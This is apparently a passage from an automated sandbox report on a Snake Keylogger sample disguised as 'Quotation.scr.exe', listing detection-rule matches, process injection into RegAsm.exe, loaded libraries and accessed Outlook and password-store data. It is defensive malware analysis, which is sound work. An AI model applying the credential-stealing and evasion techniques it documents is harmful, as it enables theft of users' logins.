                    Source: 0.2.Quotation.scr.exe.34c8c50.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.Quotation.scr.exe.34c8c50.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.Quotation.scr.exe.34c8c50.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 0.2.Quotation.scr.exe.34c8c50.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 0.2.Quotation.scr.exe.34c8c50.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 0.2.Quotation.scr.exe.34c8c50.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 0.2.Quotation.scr.exe.3461590.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.Quotation.scr.exe.3461590.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 0.2.Quotation.scr.exe.3461590.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 00000000.00000002.2252517628.0000000003569000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 00000000.00000002.2252517628.0000000003461000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 00000002.00000002.4572109366.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: Process Memory Space: Quotation.scr.exe PID: 3108, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: Process Memory Space: RegAsm.exe PID: 2432, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: initial sampleStatic PE information: Filename: Quotation.scr.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess Stats: CPU usage > 49%
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_0586CCB0 NtProtectVirtualMemory,0_2_0586CCB0
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_0586E1A0 NtResumeThread,0_2_0586E1A0
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_0586CCA9 NtProtectVirtualMemory,0_2_0586CCA9
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_0586E198 NtResumeThread,0_2_0586E198
                    Source: Quotation.scr.exe, 00000000.00000002.2252517628.0000000003461000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Quotation.scr.exe
                    Source: Quotation.scr.exe, 00000000.00000002.2252517628.0000000003461000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs Quotation.scr.exe
                    Source: Quotation.scr.exe, 00000000.00000002.2254190074.00000000057F0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs Quotation.scr.exe
                    Source: Quotation.scr.exe, 00000000.00000002.2255020547.0000000005A70000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Quotation.scr.exe
                    Source: Quotation.scr.exe, 00000000.00000002.2245312531.000000000058E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Quotation.scr.exe
                    Source: Quotation.scr.exe, 00000000.00000002.2245862196.0000000002903000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs Quotation.scr.exe
                    Source: Quotation.scr.exe, 00000000.00000000.2115204197.0000000000144000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameVeoxmodkw.exe4 vs Quotation.scr.exe
                    Source: Quotation.scr.exe, 00000000.00000002.2252517628.00000000033E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Quotation.scr.exe
                    Source: Quotation.scr.exe, 00000000.00000002.2245862196.0000000002427000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs Quotation.scr.exe
                    Source: Quotation.scr.exe, 00000000.00000002.2253589437.0000000005590000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameFfxzkbh.dll" vs Quotation.scr.exe
                    Source: Quotation.scr.exe, 00000000.00000002.2245862196.0000000002876000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Quotation.scr.exe
                    Source: Quotation.scr.exeBinary or memory string: OriginalFilenameVeoxmodkw.exe4 vs Quotation.scr.exe
                    Source: Quotation.scr.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 0.2.Quotation.scr.exe.34c8c50.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.Quotation.scr.exe.34c8c50.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.Quotation.scr.exe.34c8c50.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.Quotation.scr.exe.34c8c50.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 0.2.Quotation.scr.exe.34c8c50.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.Quotation.scr.exe.34c8c50.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 0.2.Quotation.scr.exe.3461590.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.Quotation.scr.exe.3461590.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.Quotation.scr.exe.3461590.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 00000000.00000002.2252517628.0000000003569000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 00000000.00000002.2252517628.0000000003461000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 00000002.00000002.4572109366.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: Process Memory Space: Quotation.scr.exe PID: 3108, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: Process Memory Space: RegAsm.exe PID: 2432, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.Quotation.scr.exe.34c8c50.2.raw.unpack, K---.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Quotation.scr.exe.34c8c50.2.raw.unpack, --R--.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Quotation.scr.exe.5a70000.8.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                    Source: 0.2.Quotation.scr.exe.5a70000.8.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                    Source: 0.2.Quotation.scr.exe.5a70000.8.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
                    Source: 0.2.Quotation.scr.exe.5a70000.8.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
                    Source: 0.2.Quotation.scr.exe.3411570.1.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                    Source: 0.2.Quotation.scr.exe.3411570.1.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                    Source: 0.2.Quotation.scr.exe.34c8c50.2.raw.unpack, K---.csBase64 encoded string: 'UzWebPv57/MVh76TQDG4CbNFpn7XxfirTsBUOsLwJPvNREEYND/Y72ZMmZCNMrPm'
                    Source: 0.2.Quotation.scr.exe.3461590.3.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 0.2.Quotation.scr.exe.5a70000.8.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                    Source: 0.2.Quotation.scr.exe.5a70000.8.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                    Source: 0.2.Quotation.scr.exe.5a70000.8.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.Quotation.scr.exe.3461590.3.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.Quotation.scr.exe.3411570.1.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.Quotation.scr.exe.5a70000.8.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 0.2.Quotation.scr.exe.3461590.3.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                    Source: 0.2.Quotation.scr.exe.3411570.1.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 0.2.Quotation.scr.exe.5a70000.8.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 0.2.Quotation.scr.exe.3411570.1.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                    Source: 0.2.Quotation.scr.exe.3411570.1.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                    Source: 0.2.Quotation.scr.exe.3411570.1.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 0.2.Quotation.scr.exe.5a70000.8.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                    Source: 0.2.Quotation.scr.exe.3461590.3.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 0.2.Quotation.scr.exe.3461590.3.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                    Source: 0.2.Quotation.scr.exe.3461590.3.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                    Source: 0.2.Quotation.scr.exe.3411570.1.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/0@4/4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: NULL
                    Source: Quotation.scr.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: Quotation.scr.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Users\user\Desktop\Quotation.scr.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: RegAsm.exe, 00000002.00000002.4574409470.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4574409470.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4574409470.0000000002FA4000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4574409470.0000000002F7F000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4574409470.0000000002F61000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: Quotation.scr.exeVirustotal: Detection: 28%
                    Source: Quotation.scr.exeReversingLabs: Detection: 31%
                    Source: unknownProcess created: C:\Users\user\Desktop\Quotation.scr.exe "C:\Users\user\Desktop\Quotation.scr.exe"
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                    Source: C:\Users\user\Desktop\Quotation.scr.exe Section loaded: mscoree.dll
                    Source: C:\Users\user\Desktop\Quotation.scr.exe Section loaded: apphelp.dll
                    Source: C:\Users\user\Desktop\Quotation.scr.exe Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\Desktop\Quotation.scr.exe Section loaded: version.dll
                    Source: C:\Users\user\Desktop\Quotation.scr.exe Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\Desktop\Quotation.scr.exe Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\Desktop\Quotation.scr.exe Section loaded: windows.storage.dll
                    Source: C:\Users\user\Desktop\Quotation.scr.exe Section loaded: wldp.dll
                    Source: C:\Users\user\Desktop\Quotation.scr.exe Section loaded: profapi.dll
                    Source: C:\Users\user\Desktop\Quotation.scr.exe Section loaded: cryptsp.dll
                    Source: C:\Users\user\Desktop\Quotation.scr.exe Section loaded: rsaenh.dll
                    Source: C:\Users\user\Desktop\Quotation.scr.exe Section loaded: cryptbase.dll
                    Source: C:\Users\user\Desktop\Quotation.scr.exe Section loaded: rasapi32.dll
                    Source: C:\Users\user\Desktop\Quotation.scr.exe Section loaded: rasman.dll
                    Source: C:\Users\user\Desktop\Quotation.scr.exe Section loaded: rtutils.dll
                    Source: C:\Users\user\Desktop\Quotation.scr.exe Section loaded: mswsock.dll
                    Source: C:\Users\user\Desktop\Quotation.scr.exe Section loaded: winhttp.dll
                    Source: C:\Users\user\Desktop\Quotation.scr.exe Section loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\Desktop\Quotation.scr.exe Section loaded: iphlpapi.dll
                    Source: C:\Users\user\Desktop\Quotation.scr.exe Section loaded: dhcpcsvc6.dll
                    Source: C:\Users\user\Desktop\Quotation.scr.exe Section loaded: dhcpcsvc.dll
                    Source: C:\Users\user\Desktop\Quotation.scr.exe Section loaded: dnsapi.dll
                    Source: C:\Users\user\Desktop\Quotation.scr.exe Section loaded: winnsi.dll
                    Source: C:\Users\user\Desktop\Quotation.scr.exe Section loaded: rasadhlp.dll
                    Source: C:\Users\user\Desktop\Quotation.scr.exe Section loaded: fwpuclnt.dll
                    Source: C:\Users\user\Desktop\Quotation.scr.exe Section loaded: secur32.dll
                    Source: C:\Users\user\Desktop\Quotation.scr.exe Section loaded: sspicli.dll
                    Source: C:\Users\user\Desktop\Quotation.scr.exe Section loaded: schannel.dll
                    Source: C:\Users\user\Desktop\Quotation.scr.exe Section loaded: mskeyprotect.dll
                    Source: C:\Users\user\Desktop\Quotation.scr.exe Section loaded: ntasn1.dll
                    Source: C:\Users\user\Desktop\Quotation.scr.exe Section loaded: ncrypt.dll
                    Source: C:\Users\user\Desktop\Quotation.scr.exe Section loaded: ncryptsslp.dll
                    Source: C:\Users\user\Desktop\Quotation.scr.exe Section loaded: msasn1.dll
                    Source: C:\Users\user\Desktop\Quotation.scr.exe Section loaded: gpapi.dll
                    Source: C:\Users\user\Desktop\Quotation.scr.exe Section loaded: amsi.dll
                    Source: C:\Users\user\Desktop\Quotation.scr.exe Section loaded: userenv.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mscoree.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: apphelp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: aclayers.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mpr.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc_os.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: kernel.appcore.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: version.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: uxtheme.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wtsapi32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winsta.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: windows.storage.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wldp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: profapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptsp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rsaenh.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptbase.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rasapi32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rasman.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rtutils.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mswsock.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winhttp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ondemandconnroutehelper.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: iphlpapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dhcpcsvc6.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dhcpcsvc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dnsapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winnsi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rasadhlp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: fwpuclnt.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: secur32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sspicli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: schannel.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mskeyprotect.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ntasn1.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ncrypt.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ncryptsslp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msasn1.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: gpapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dpapi.dll
                    Source: C:\Users\user\Desktop\Quotation.scr.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                    Source: C:\Users\user\Desktop\Quotation.scr.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                    Source: Quotation.scr.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: Quotation.scr.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Quotation.scr.exe, 00000000.00000002.2252517628.0000000003461000.00000004.00000800.00020000.00000000.sdmp, Quotation.scr.exe, 00000000.00000002.2255020547.0000000005A70000.00000004.08000000.00040000.00000000.sdmp, Quotation.scr.exe, 00000000.00000002.2252517628.00000000033E9000.00000004.00000800.00020000.00000000.sdmp, Quotation.scr.exe, 00000000.00000002.2245862196.0000000002876000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Quotation.scr.exe, 00000000.00000002.2252517628.0000000003461000.00000004.00000800.00020000.00000000.sdmp, Quotation.scr.exe, 00000000.00000002.2255020547.0000000005A70000.00000004.08000000.00040000.00000000.sdmp, Quotation.scr.exe, 00000000.00000002.2252517628.00000000033E9000.00000004.00000800.00020000.00000000.sdmp, Quotation.scr.exe, 00000000.00000002.2245862196.0000000002876000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdbSHA256}Lq source: Quotation.scr.exe, 00000000.00000002.2254190074.00000000057F0000.00000004.08000000.00040000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdb source: Quotation.scr.exe, 00000000.00000002.2254190074.00000000057F0000.00000004.08000000.00040000.00000000.sdmp

                    Data Obfuscation

                    Source: 0.2.Quotation.scr.exe.5a70000.8.raw.unpack, ReflectionHelper.cs .Net Code: InvokeMethod
                    Source: 0.2.Quotation.scr.exe.5a70000.8.raw.unpack, XmlSerializationHelper.cs .Net Code: ReadObjectProperties
                    Source: 0.2.Quotation.scr.exe.3411570.1.raw.unpack, ReflectionHelper.cs .Net Code: InvokeMethod
                    Source: 0.2.Quotation.scr.exe.3411570.1.raw.unpack, XmlSerializationHelper.cs .Net Code: ReadObjectProperties
